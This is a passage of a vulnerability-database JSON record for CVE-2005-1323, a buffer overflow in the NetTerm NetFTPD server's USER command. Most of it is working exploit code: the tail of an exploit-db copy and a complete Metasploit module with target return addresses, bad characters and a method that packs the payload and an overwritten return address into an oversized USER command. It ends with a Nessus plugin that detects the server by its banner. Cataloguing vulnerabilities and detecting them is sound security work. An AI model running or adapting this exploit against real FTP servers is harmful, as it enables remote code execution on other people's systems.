Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target 
#{target.name}...\")\r\n\r\n\t\t# U push ebp\r\n\t\t# S push ebx\r\n\t\t# E inc ebp\r\n\t\t# R push edx\r\n\t\t# \\x20\\xC0 and al, al\r\n\r\n\t\tbuf = rand_text_english(8192, payload_badchars)\r\n\t\tbuf[0, 1] = \"\\xc0\"\r\n\t\tbuf[1, payload.encoded.length] = payload.encoded\r\n\t\tbuf[1014, 4] = [ target.ret ].pack('V')\r\n\r\n\t\tsend_cmd( [\"USER #{buf}\"] )\r\n\t\tsend_cmd( ['HELP'] )\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16735/"}], "metasploit": [{"lastseen": "2020-08-02T23:06:18", "description": "This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.\n", "published": "2005-11-24T19:04:37", "type": "metasploit", "title": "NetTerm NetFTPD USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2018-09-15T23:54:45", "id": "MSF:EXPLOIT/WINDOWS/FTP/NETTERM_NETFTPD_USER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetTerm NetFTPD USER Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the NetTerm NetFTPD\n application. 
This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-1323'],\n [ 'OSVDB', '15865'],\n [ 'URL', 'https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],\n [ 'BID', '13396'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\\x0a\\x20\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => [ 'win' ],\n 'Targets' =>\n [\n [\n 'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005\n {\n 'Ret' => 0x0040df98, # netftpd.exe (multiple versions)\n },\n ],\n [\n 'Windows 2000 English',\n {\n 'Ret' => 0x75022ac4, # ws2help.dll\n },\n ],\n [\n 'Windows XP English SP0/SP1',\n {\n 'Ret' => 0x71aa32ad, # ws2help.dll\n },\n ],\n [\n 'Windows 2003 English',\n {\n 'Ret' => 0x7ffc0638, # peb magic :-)\n },\n ],\n [\n 'Windows NT 4.0 SP4/SP5/SP6',\n {\n 'Ret' => 0x77681799, # ws2help.dll\n },\n ],\n ],\n 'DisclosureDate' => 'Apr 26 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n connect\n disconnect\n if (banner =~ /NetTerm FTP server/)\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n print_status(\"Trying target #{target.name}...\")\n\n # U push ebp\n # S push ebx\n # E inc ebp\n # R push edx\n # \\x20\\xC0 and al, al\n\n buf = rand_text_english(8192, payload_badchars)\n buf[0, 1] = \"\\xc0\"\n buf[1, payload.encoded.length] = payload.encoded\n buf[1014, 4] = [ target.ret ].pack('V')\n\n send_cmd( [\"USER #{buf}\"] )\n send_cmd( ['HELP'] )\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/netterm_netftpd_user.rb"}], "nessus": [{"lastseen": "2021-01-01T03:54:51", "description": "The remote server is running NetTerm Netftpd server.\n\nThere is a buffer 
overflow condition in the remote version of this\nsoftware. An attacker may exploit this flaw to execute arbitrary code\non the remote host with the privileges of the FTP server.", "edition": 26, "published": "2005-04-26T00:00:00", "title": "Intersoft NetTerm Netftpd USER Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1323"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:intersoft:netterm"], "id": "NETFTPD.NASL", "href": "https://www.tenable.com/plugins/nessus/18142", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif(description)\n{\n script_id(18142);\n script_version (\"1.18\");\n script_cve_id(\"CVE-2005-1323\");\n script_bugtraq_id(13396);\n\n script_name(english:\"Intersoft NetTerm Netftpd USER Command Remote Overflow\");\n script_summary(english:\"Checks for NetTerm Netftpd\");\n\n script_set_attribute(\n attribute:'synopsis',\n value:'The remote service is prone to a buffer overflow.'\n );\n\n script_set_attribute(\n attribute:'description',\n value:\"The remote server is running NetTerm Netftpd server.\n\nThere is a buffer overflow condition in the remote version of this\nsoftware. 
An attacker may exploit this flaw to execute arbitrary code\non the remote host with the privileges of the FTP server.\"\n );\n\n script_set_attribute(\n attribute:'solution',\n value: \"Upgrade to a version of NetTerm greater than 5.1.1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NetTerm NetFTPD USER Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(\n attribute:'see_also',\n value:'https://www.securityfocus.com/archive/1/396959'\n );\n \n # https://web.archive.org/web/20050727084625/http://www.securenetterm.com/html/what_s_new.html\n script_set_attribute(\n attribute:'see_also',\n value:'http://www.nessus.org/u?5567affe'\n );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:intersoft:netterm\");\n script_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"FTP\");\n script_dependencie(\"ftp_anonymous.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port(default: 21);\n\nftpbanner = get_ftp_banner(port:port);\nif (! 
ftpbanner ) exit(1);\nif ( egrep(pattern:\"^220 NetTerm FTP server ready\", string:ftpbanner) )\n\tsecurity_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}